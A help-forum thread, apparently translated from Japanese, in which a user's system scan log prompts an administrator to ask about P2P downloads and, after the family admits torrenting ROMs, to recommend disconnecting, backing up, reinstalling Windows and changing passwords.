[2014/02/15 00:25:17 | 000,178,688 | ---- | C] () -- C:\WINDOWS\SysWow64\unrar.dll
[2014/02/15 00:25:15 | 000,715,038 | ---- | C] () -- C:\WINDOWS\unins000.exe
[2014/02/15 00:25:15 | 000,216,064 | ---- | C] ( ) -- C:\WINDOWS\SysWow64\lagarith.dll
[2014/02/15 00:25:15 | 000,001,990 | ---- | C] () -- C:\WINDOWS\unins000.dat
[2013/10/28 17:28:07 | 000,188,416 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_core.dll
[2013/10/28 17:28:07 | 000,069,632 | ---- | C] () -- C:\WINDOWS\SysWow64\utv_vcm.dll
[2013/09/15 16:04:47 | 000,000,189 | ---- | C] () -- C:\Users\ryota\AppData\Roaming\WB.CFG
[2013/08/23 00:36:43 | 000,215,943 | ---- | C] () -- C:\WINDOWS\SysWow64\dssec.dat
[2013/08/23 00:36:42 | 000,000,741 | ---- | C] () -- C:\WINDOWS\SysWow64\NOISE.DAT
[2013/08/22 23:46:23 | 000,067,584 | --S- | C] () -- C:\WINDOWS\bootstat.dat
[2013/08/22 16:01:23 | 000,043,131 | ---- | C] () -- C:\WINDOWS\mib.bin
[2013/08/22 08:55:20 | 000,364,544 | ---- | C] () -- C:\WINDOWS\SysWow64\msjetoledb40.dll
[2013/08/22 08:52:39 | 000,673,088 | ---- | C] () -- C:\WINDOWS\SysWow64\mlang.dat
[2012/12/18 00:56:03 | 001,161,682 | ---- | C] () -- C:\Users\ryota\記録されたゲーム - 17-12-2012 10`00`02.mgx
[2012/12/13 15:28:00 | 012,706,828 | ---- | C] () -- C:\Users\ryota\03 Another Heaven.mp3
[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Kaleidoscope(transparent mix|Bonus Track).mp3
[2012/12/13 15:28:00 | 009,962,152 | ---- | C] () -- C:\Users\ryota\05 ARCADIA-Instrumental-.mp3
[2012/12/13 15:28:00 | 009,877,588 | ---- | C] () -- C:\Users\ryota\02 HORIZON.mp3
[2012/12/13 15:28:00 | 009,842,092 | ---- | C] () -- C:\Users\ryota\01 ARCADIA.mp3
[2012/12/13 15:28:00 | 003,751,396 | ---- | C] () -- C:\Users\ryota\04 ARCADIA-game Ver.-.mp3
[2012/10/31 18:22:16 | 000,003,077 | ---- | C] () -- C:\ProgramData\cfSB1290.ini

[color=#E56717]========== ZeroAccess Check ==========[/color]

[2015/04/20 22:45:57 | 000,000,227 | RHS- | M] () -- C:\WINDOWS\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] /64

[HKEY_CURRENT_USER\Software\Classes\Wow6432node\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] /64
"" = C:\Windows\SysNative\shell32.dll -- [2015/02/13 02:40:58 | 022,291,584 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]
"" = %SystemRoot%\system32\shell32.dll -- [2015/02/13 02:34:06 | 019,731,824 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\fastprox.dll -- [2014/10/29 10:19:43 | 001,013,760 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]
"" = %systemroot%\system32\wbem\fastprox.dll -- [2014/10/29 09:59:23 | 000,786,944 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] /64
"" = C:\Windows\SysNative\wbem\wbemess.dll -- [2014/10/29 10:16:01 | 000,512,512 | ---- | M] (Microsoft Corporation)
"ThreadingModel" = Both

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

[color=#E56717]========== Custom Scans ==========[/color]

[color=#A23BEC]< %windir%\tasks\*.job >[/color]
[2015/04/22 23:48:00 | 000,000,626 | ---- | M] () -- C:\WINDOWS\tasks\Adobe Flash Player Updater.job
[2015/04/22 23:42:12 | 000,000,702 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineCore.job
[2015/04/22 22:59:00 | 000,000,706 | ---- | M] () -- C:\WINDOWS\tasks\GoogleUpdateTaskMachineUA.job

[color=#E56717]========== Drive Information ==========[/color]

Physical Drives
---------------

Drive: \\\\.\\PHYSICALDRIVE0 - Fixed hard disk media
Interface type: IDE
Media Type: Fixed hard disk media
Model: WDC WD5000AAKX-00ERMA0
Partitions: 5
Status: OK
Status Info: 0

Drive: \\\\.\\PHYSICALDRIVE1 -
Interface type: USB
Media Type:
Model: Multi Flash Reader USB Device
Partitions: 0
Status: OK
Status Info: 0

Partitions
---------------

DeviceID: Disk #0, Partition #0
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 300.00MB
Starting Offset: 1048576
Hidden sectors: 0


DeviceID: Disk #0, Partition #1
PartitionType: GPT: System
Bootable: True
BootPartition: True
PrimaryPartition: True
Size: 100.00MB
Starting Offset: 315621376
Hidden sectors: 0


DeviceID: Disk #0, Partition #2
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 8.00GB
Starting Offset: 554696704
Hidden sectors: 0


DeviceID: Disk #0, Partition #3
PartitionType: GPT: Basic Data
Bootable: False
BootPartition: False
PrimaryPartition: True
Size: 457.00GB
Starting Offset: 8943304704
Hidden sectors: 0


DeviceID: Disk #0, Partition #4
PartitionType: GPT: Unknown
Bootable: False
BootPartition: False
PrimaryPartition: False
Size: 456.00MB
Starting Offset: 499629686784
Hidden sectors: 0


[color=#E56717]========== Base Services ==========[/color]
SRV:[b]64bit:[/b] - [2014/10/29 11:42:20 | 000,214,528 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\aelupsvc.dll -- (AeLookupSvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:33 | 000,110,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\appinfo.dll -- (Appinfo)
SRV:[b]64bit:[/b] - [2014/10/29 10:21:02 | 000,096,768 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\alg.exe -- (ALG)
SRV:[b]64bit:[/b] - [2014/10/29 10:43:34 | 000,933,376 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\qmgr.dll -- (BITS)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:40 | 000,845,312 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\BFE.DLL -- (BFE)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:40 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\keyiso.dll -- (KeyIso)
SRV - [2014/10/29 10:01:27 | 000,046,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\keyiso.dll -- (KeyIso)
SRV:[b]64bit:[/b] - [2014/10/29 10:12:28 | 000,516,608 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\es.dll -- (EventSystem)
SRV - [2014/10/29 09:55:10 | 000,367,616 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\es.dll -- (EventSystem)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:50 | 000,135,168 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\browser.dll -- (Browser)
SRV:[b]64bit:[/b] - [2014/10/29 10:27:24 | 000,131,584 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\cryptsvc.dll -- (CryptSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (DcomLaunch)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:06 | 000,365,056 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dhcpcore.dll -- (Dhcp)
SRV - [2014/10/29 10:05:58 | 000,292,864 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\dhcpcore.dll -- (Dhcp)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:41 | 000,252,416 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\dnsrslvr.dll -- (Dnscache)
SRV:[b]64bit:[/b] - [2014/10/29 10:14:35 | 000,110,592 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\eapsvc.dll -- (Eaphost)
SRV:[b]64bit:[/b] - [2014/10/29 11:44:23 | 000,033,792 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\hidserv.dll -- (hidserv)
SRV - [2014/10/29 10:59:46 | 000,030,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\hidserv.dll -- (hidserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:07:58 | 000,452,608 | ---- | M] (Microsoft Corporation) [Disabled | Stopped] -- C:\Windows\SysNative\ipnathlp.dll -- (SharedAccess)
SRV:[b]64bit:[/b] - [2014/10/29 10:08:58 | 000,397,312 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\IPSECSVC.DLL -- (PolicyAgent)
No service found with a name of MsMpSvc
No service found with a name of NisSrv
SRV:[b]64bit:[/b] - [2014/10/29 10:01:45 | 000,706,048 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\swprv.dll -- (swprv)
SRV:[b]64bit:[/b] - [2014/10/29 10:22:44 | 000,071,168 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\mmcss.dll -- (MMCSS)
SRV:[b]64bit:[/b] - [2014/10/29 09:51:03 | 000,266,752 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netman.dll -- (Netman)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:20 | 000,550,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\netprofmsvc.dll -- (netprofm)
SRV:[b]64bit:[/b] - [2014/12/06 10:41:58 | 000,391,680 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nlasvc.dll -- (NlaSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:29:16 | 000,028,672 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\nsisvc.dll -- (nsi)
SRV:[b]64bit:[/b] - [2014/10/29 11:45:24 | 000,116,736 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\SysNative\umpnpmgr.dll -- (PlugPlay)
SRV:[b]64bit:[/b] - [2014/10/29 09:54:15 | 000,827,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\spoolsv.exe -- (Spooler)
No service found with a name of ProtectedStorage
No service found with a name of EMDMgmt
SRV:[b]64bit:[/b] - [2014/10/29 11:34:42 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasauto.dll -- (RasAuto)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:21 | 000,542,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\rasmans.dll -- (RasMan)
SRV:[b]64bit:[/b] - [2014/10/29 10:19:29 | 000,817,664 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\rpcss.dll -- (RpcSs)
SRV:[b]64bit:[/b] - [2014/10/29 11:42:25 | 000,031,744 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\seclogon.dll -- (seclogon)
SRV:[b]64bit:[/b] - [2014/10/29 12:51:48 | 000,047,024 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\lsass.exe -- (SamSs)
SRV:[b]64bit:[/b] - [2014/10/29 09:56:06 | 000,146,944 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wscsvc.dll -- (wscsvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:49 | 000,329,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\srvsvc.dll -- (LanmanServer)
SRV:[b]64bit:[/b] - [2014/10/29 10:04:06 | 000,640,000 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\shsvcs.dll -- (ShellHWDetection)
SRV - [2014/10/29 09:49:09 | 000,576,512 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysWOW64\shsvcs.dll -- (ShellHWDetection)
No service found with a name of slsvc
SRV:[b]64bit:[/b] - [2014/10/29 09:52:52 | 001,265,152 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\schedsvc.dll -- (Schedule)
SRV:[b]64bit:[/b] - [2014/10/29 11:12:14 | 000,313,344 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\tapisrv.dll -- (TapiSrv)
SRV - [2014/10/29 10:34:59 | 000,254,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysWOW64\tapisrv.dll -- (TapiSrv)
SRV:[b]64bit:[/b] - [2014/10/29 10:26:29 | 000,059,392 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\themeservice.dll -- (Themes)
SRV:[b]64bit:[/b] - [2014/12/09 10:50:34 | 000,225,280 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\profsvc.dll -- (ProfSvc)
SRV:[b]64bit:[/b] - [2014/10/29 09:59:28 | 001,454,080 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\VSSVC.exe -- (VSS)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:48 | 000,911,360 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\audiosrv.dll -- (Audiosrv)
SRV:[b]64bit:[/b] - [2014/12/06 10:35:00 | 000,229,888 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\AudioEndpointBuilder.dll -- (AudioEndpointBuilder)
No service found with a name of SDRSVC
SRV:[b]64bit:[/b] - [2015/02/04 08:58:28 | 000,023,792 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Program Files\Windows Defender\MsMpEng.exe -- (WinDefend)
SRV:[b]64bit:[/b] - [2014/10/29 10:16:27 | 001,696,256 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wevtsvc.dll -- (EventLog)
SRV:[b]64bit:[/b] - [2014/10/29 10:02:44 | 000,880,640 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\MPSSVC.dll -- (MpsSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:59:24 | 000,670,720 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wiaservc.dll -- (stisvc)
SRV:[b]64bit:[/b] - [2014/10/29 11:35:14 | 000,064,512 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysNative\msiexec.exe -- (msiserver)
SRV - [2014/10/29 10:52:53 | 000,059,904 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\WINDOWS\SysWow64\msiexec.exe -- (msiserver)
SRV:[b]64bit:[/b] - [2014/10/29 10:18:13 | 000,230,400 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\SysNative\wbem\WMIsvc.dll -- (Winmgmt)
SRV:[b]64bit:[/b] - [2015/03/14 09:22:58 | 003,678,720 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wuaueng.dll -- (wuauserv)
SRV:[b]64bit:[/b] - [2014/10/29 10:53:17 | 000,262,144 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\dot3svc.dll -- (dot3svc)
SRV:[b]64bit:[/b] - [2014/10/29 10:03:56 | 001,547,264 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\SysNative\wlansvc.dll -- (WlanSvc)
SRV:[b]64bit:[/b] - [2014/10/29 10:24:29 | 000,289,280 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\SysNative\wkssvc.dll -- (LanmanWorkstation)

[color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color]
[2007/11/20 23:08:08 | 000,562,688 | ---- | M] (Microsoft Corporation) -- C:\install.exe
[2010/07/08 01:11:00 | 000,183,296 | R--- | M] (I-O DATA DEVICE,INC.) -- C:\IOOCI.EXE

[color=#E56717]========== Files - Unicode (All) ==========[/color]
(C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游??器 3) -- C:\Users\ryota\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\傲游浏览器 3

[color=#E56717]========== Alternate Data Streams ==========[/color]

@Alternate Data Stream - 118 bytes -> C:\ProgramData\Temp:373E1720

< End of report >
  • かなは
  • 2015/04/23 (Thu) 12:02:03
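[Jumping in] Could I ask you to check a few things?
Good evening.
I'm 悪代官, the administrator here.

Something about this case bothers me, so would you mind if I looked into it a little?
If that's all right, please read the explanation below and then carry out the checks and steps in order.

First, the following applications appear to be old versions, so please uninstall all of them with GU.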
>Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305

>ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0

>Lhaplus 2014/11/13

>Mozilla Firefox 37.0.1 (x86 ja) Mozilla 2015/04/04 83.5 MB 37.0.1

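>Skype(TM) 7.3 Skype Technologies S.A. 2015/04/04 49.4 MB 7.3.101
After that, download the applications you need from their official sites and reinstall them.
If you don't need them, you don't have to reinstall them.

Next, I don't think the following need to be reinstalled, so I recommend uninstalling them with GU in Safe Mode.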
>ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209

>Hounds DMM 2014/05/10 1.0.0

>KDrive kingsoft 2014/11/13 1.21.0.1584

>KDriveプラグイン kingsoft 2014/11/13 1.0.0.1

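Once you have checked the above and finished reinstalling, the next check is an important one.

You said the PC in question is shared by your family, so I'm asking every user (every family member) to answer honestly.
Has anyone used applications that are problematic legally or security-wise, such as P2P, accessed suspicious overseas sites (especially Chinese ones and the like) or uploader sites, or downloaded files from them?
Looking at the logs, I can see several odd Asian-origin entries.

If those were used, there may be legal problems, copyright alone being one, but beyond that there is also a strong possibility that an infection inside the PC has left no time to spare.
If no one in the family has any recollection of having anything to do with such sites or files, then that fear is probably unfounded, so just let me know that.

But if anyone really has touched an untrustworthy site or file even once, please tell me honestly as much as you remember about it.

Asian malware is, to begin with, far harder to analyze and treat than Western malware.
Once it has gotten in, it is not unusual for the damage to spread further while time is spent investigating, so from a safety-first standpoint I quite often recommend a recovery as soon as that possibility shows up.

As an example, here is the entry for an mp3 file downloaded from somewhere in December 2012: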
>[2012/12/13 15:28:00 | 010,296,232 | ---- | C] () -- C:\Users\ryota\06 Kaleidoscope(transparent mix|Bonus Track).mp3
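As far as I can see, this does not look like a legitimate file either.
There are also other odd entries and traces of files.

On a PC shared by multiple users, at home or at work, if even one person misuses it, every user's data is put at risk together, and it readily happens that all the data on the PC is leaked onto the net.
This board has in fact received reports of and consultations about such damage many times.
And once those symptoms were confirmed, the only course of action was a recovery, but simply doing a recovery does not mean the matter is resolved.
Data that has leaked onto the net once can no longer be retrieved.
It is pointless unless the affected users also change all their personal information, such as past data and passwords, and protect themselves against being hit again.

First, please check with your whole family and reply with their answers.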
  • 悪代官
  • 2015/04/24 (Fri) 20:23:02
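Re: Pop-ups and ads are being forcibly displayed and I don't know what to do.
I apologize for the late reply.
First of all, thank you for your warning and advice.
On to the main point:

I asked my family, and although I can't judge whether it was P2P (I'm not familiar with it), they said they illegally downloaded some game data.
As far as I can tell, there also seem to be torrent files.
When I asked where they downloaded them, they said it was a site that was all in English, and that they apparently followed directions on something like an aggregator site and jumped to the page.
I don't know what kind of site it was. It seems they were downloading what are commonly called ROMs and emulators.
That is all I was able to find out.
I was able to find some of these files myself, but is it enough to just delete them?
I don't know specifically what to do, so I'll leave them as they are until I get instructions.
That is the most I can do right now.

Also, you wrote to uninstall with GU, but I don't know what GU is, so I haven't done anything about that yet either.
I'm sorry to impose, but could you explain it to me?
Thank you in advance.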
  • かなは
  • 2015/04/25 (Sat) 17:55:32
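Recovery recommended, after explaining the background and situation to your whole family
Sorry for the late reply.
I'm glad we checked.

>I asked my family, and although I can't judge whether it was P2P (I'm not familiar with it), they said they illegally downloaded some game data.
>As far as I can tell, there also seem to be torrent files.

>I don't know what kind of site it was. It seems they were downloading what are commonly called ROMs and emulators.

So it is P2P torrent after all.
Setting aside what files were downloaded from where, this makes it clear that the situation is quite serious.
Please assume that most of the files exchanged over P2P are "traps" (snares).
The claim that you can get for free what would normally be expensive applications or paid-only content exists because it is a decoy that uses that as bait to extract something in return.

As I have told other people seeking help more times than I can count, malware that infects via P2P is, as a rule, 【markedly】 harder to treat than other kinds of malware.
And there have likewise been many cases where, by the time a P2P malware infection was discovered, it was already too late.

Those who create and distribute P2P malware are seldom after money from the start, but for the affected users the damage is in a sense even more serious than that.
As one example, it relays (leaks) the infected PC's desktop screen and what is being done on it onto the net in real time, exposing all of the affected user's personal information and communications.
It also relays in the same way the user's desperate attempts to remove it once they notice the infection, so the user ends up being laughed at by outside net users watching the leaked screen.
And malicious parties who notice that removal is being attempted go as far as to interfere with the affected user's work.
A PC whose protection against the outside has been disabled through P2P is defenseless against unauthorized access from outside, so it is manipulated at will by outside control while refusing the real user's input.
You may think this looks exaggerated, and that is fine, but the main aim of those who create and distribute P2P malware is to enjoy watching affected users suffer and struggle, so the creators themselves often have not considered any way of fully removing it once infected, and in that case the only remaining remedy is a recovery.

In conclusion, I recommend that you immediately disconnect physically from the net, for example by unplugging the LAN cable, back up the data every user needs, and then carry out a recovery as soon as that is done.
After the recovery, immediately bring your security software, Windows Update and so on up to date, then run one full scan with the up-to-date security software; if no infection or abnormality is found, you are safe.

Next, please also change all passwords and the like that have ever been entered on the PC before the recovery.
In particular, if anyone has done online shopping or online banking, changing that information is the top priority and is mandatory.
Note that files and the like obtained via P2P or untrustworthy channels must not be backed up at all.
If 【even one】 of them still remains, discard it immediately.

When a PC shared by the whole family is infected via P2P, the damage is not confined to a single user.
In particular, if any user uses that PC for work even a little, the damage becomes even more critical.

First, have your whole family read this thread right away, then start on the backup immediately.

Once the recovery and password changes are done, take the HJT log, the installed-programs log and the logs from each tab in CC again, and post them in a reply together with a report on the state after recovery.
Doing the recovery alone does not resolve everything.
It is then essential to check whether anything still remains, deal with any problems found to remain even after the recovery, and protect yourselves against being hit again.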
  • 悪代官
  • 2015/04/25 (Sat) 21:00:37
